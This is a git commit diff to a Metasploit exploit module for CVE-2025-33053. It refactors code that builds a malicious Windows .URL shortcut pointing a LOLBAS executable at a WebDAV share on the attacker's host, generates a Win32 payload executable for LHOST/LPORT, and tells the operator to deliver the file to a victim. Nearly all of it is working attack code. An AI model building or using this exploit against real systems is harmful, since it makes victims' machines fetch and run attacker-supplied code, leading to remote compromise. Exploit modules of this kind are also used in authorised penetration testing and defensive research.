Add some features and fix bugs for CVE-2025-33053 exploit module

DevBuiHieu · DevBuiHieu · commit cb7badbfadee · 2025-06-17T21:41:44.000-04:00
diff --git a/modules/exploits/windows/fileformat/cve_2025_33053.rb b/modules/exploits/windows/fileformat/cve_2025_33053.rb
@@ -54,7 +54,7 @@ def exploit
     prepare_webdav_dir
     generate_payload_if_needed
     write_url_file
-    print_status("Module complete. Deliver #{datastore['OUTFILE']} to victim.")
+    print_status("Module complete. Deliver #{File.expand_path(datastore['OUTFILE'])} to victim.")
   end
 
   def prepare_webdav_dir
@@ -72,13 +72,41 @@ def generate_payload_if_needed
     return unless datastore['GEN_PAYLOAD']
 
     exe_path = File.join(datastore['WEBDAV_DIR'], 'payload.exe')
-    print_good("Generating payload at: #{exe_path}")
+    print_status('Generating payload...')
     generate_payload_exe(datastore['PAYLOAD'], datastore['LHOST'], datastore['LPORT'], exe_path)
   end
 
+  def generate_payload_exe(payload_name, lhost, lport, output_path)
+    payload = framework.payloads.create(payload_name.to_s.strip)
+    payload.datastore['LHOST'] = lhost
+    payload.datastore['LPORT'] = lport
+    raw = payload.generate
+    exe = Msf::Util::EXE.to_win32pe(framework, raw)
+    write_exe_file(output_path, exe)
+  end
+
+  def write_exe_file(path, exe)
+    File.open(path, 'wb') { |f| f.write(exe) }
+    print_good("Payload successfully written to #{path}")
+  rescue Errno::EACCES
+    return_error(path)
+  end
+
   def write_url_file
+    content = generate_url_content
+    outfile = datastore['OUTFILE']
+    begin
+      print_status('Generating .URL file...')
+      File.write(outfile, content)
+      print_good(".URL file written to: #{outfile}")
+    rescue Errno::EACCES
+      return_error(File.expand_path(outfile))
+    end
+  end
+
+  def generate_url_content
     unc_path = "\\\\#{datastore['LHOST']}\\#{File.basename(datastore['WEBDAV_DIR'])}\\"
-    content = <<~URLFILE
+    <<~URLFILE
       [InternetShortcut]
       URL=#{datastore['LOLBAS_EXE']}
       WorkingDirectory=#{unc_path}
@@ -87,19 +115,13 @@ def write_url_file
       IconFile=#{datastore['ICON_PATH']}
       Modified=#{datastore['MODIFIED_HEX']}
     URLFILE
-    File.write(datastore['OUTFILE'], content)
-    print_good(".URL file written to: #{url_file}")
   end
 
-  def generate_payload_exe(payload_name, lhost, lport, output_path)
-    payload = framework.payloads.create(payload_name.to_s.strip)
-    payload.datastore['LHOST'] = lhost
-    payload.datastore['LPORT'] = lport
-    raw = payload.generate
-    exe = Msf::Util::EXE.to_win32pe(framework, raw)
-    File.open(output_path, 'wb') { |f| f.write(exe) }
-    print_good("Payload successfully written to #{output_path}")
-  rescue StandardError => e
-    print_error("Failed to generate payload: #{e.class} #{e.message}")
+  def return_error(currentpath)
+    fail_with(
+      Failure::NoAccess,
+      "Cannot write to #{currentpath}. Permission denied.\n" \
+      'Try restarting Metasploit with root privilege.'
+    )
   end
 end
